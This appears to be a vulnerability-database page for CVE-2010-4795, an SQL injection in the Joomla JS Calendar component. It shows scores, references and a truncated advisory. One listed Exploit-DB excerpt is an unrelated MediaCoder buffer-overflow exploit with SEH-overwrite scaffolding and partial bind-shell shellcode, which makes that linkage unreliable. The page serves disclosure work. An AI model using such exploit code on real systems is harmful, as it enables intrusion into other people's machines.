CVE-2010-4795
Published 2011-04-27
Priority P345 · high · 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.15% (62.9th percentile)
SQL injection vulnerability in the JS Calendar (com_jscalendar) component 1.5.1 and 1.5.4 for Joomla! allows remote attackers to execute arbitrary SQL commands via the ev_id parameter in a details action to index.php. NOTE: some of these details are obtained from third party information.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomlaseller | com_jscalendar | — | — |
| joomlaseller | com_jscalendar | — | — |
No detection rules found.
Exploit-DB
Mediacoder 0.7.5.4797 - '.m3u' Local Buffer Overflow (SEH)
exploitdb·2010-12-02
---
# Exploit Title: MediaCoder-0.7.5.4795.exe 0-days Buffer Overflow (SEH)
# Date: 02 / 12 / 2010
# Author: Oh Yaw Theng
# Software Link: http://www.mediacoderhq.com/mirrors.htm?file=MediaCoder-0.7.5.4795.exe
# Version: v0.7.5.4795 (Latest Version !!)
# Tested on: Microsoft Windows XP SP2
# CVE : N / A
# The vendor is very pitiful. This is the latest version, just released on 1 / 12 / 2010
# The software has been exploited on 2 / 12 / 2010
# This is so sad ! ==
#!/usr/bin/python
filename = "crash.m3u"
junk = "\x41" * 764
pointer = "\xEB\x08\x90\x90"
handler = "\x54\x41\x62\x01" # 01624154
nops = "\x90" * 20
# Bind a shell at Port 5555 (Telnet in and Boom !! DEADBEEF !)
shellcode =(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x
Exploit-DB
Joomla! Component JS Calendar 1.5.1 - Multiple Vulnerabilities
exploitdb·2010-10-09
---
JS Calendar 1.5.1 Joomla Component Multiple Remote Vulnerabilities
Name:              JS Calendar
Vendor:            http://www.joomlaseller.com
Versions Affected: 1.5.1
Author:            Salvatore Fresta aka Drosophila
Website:           http://www.salvatorefresta.net
Contact:           salvatorefresta [at] gmail [dot] com
Date:              2010-10-09
X. INDEX
I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
I. ABOUT THE APPLICATION
JoomlaSeller - Calendar Event is a powerful Joomla!
component which allows you to easily create events and
publish them on a desired date. It is a native build
component for Joomla! 1.5 version and can easily be
installed using the Joomla! back-end Install
functionality.
II. DESCRIPTION
Some parameters are not properly saniti
No writeups or analysis indexed.
http://adv.salvatorefresta.net/JS_Calendar_1.5.1_Joomla_Component_Multiple_Remote_Vulnerabilities-09102010.txt
http://secunia.com/advisories/41766
http://securityreason.com/securityalert/8223
http://www.exploit-db.com/exploits/15224
http://www.securityfocus.com/bid/43902
https://exchange.xforce.ibmcloud.com/vulnerabilities/62379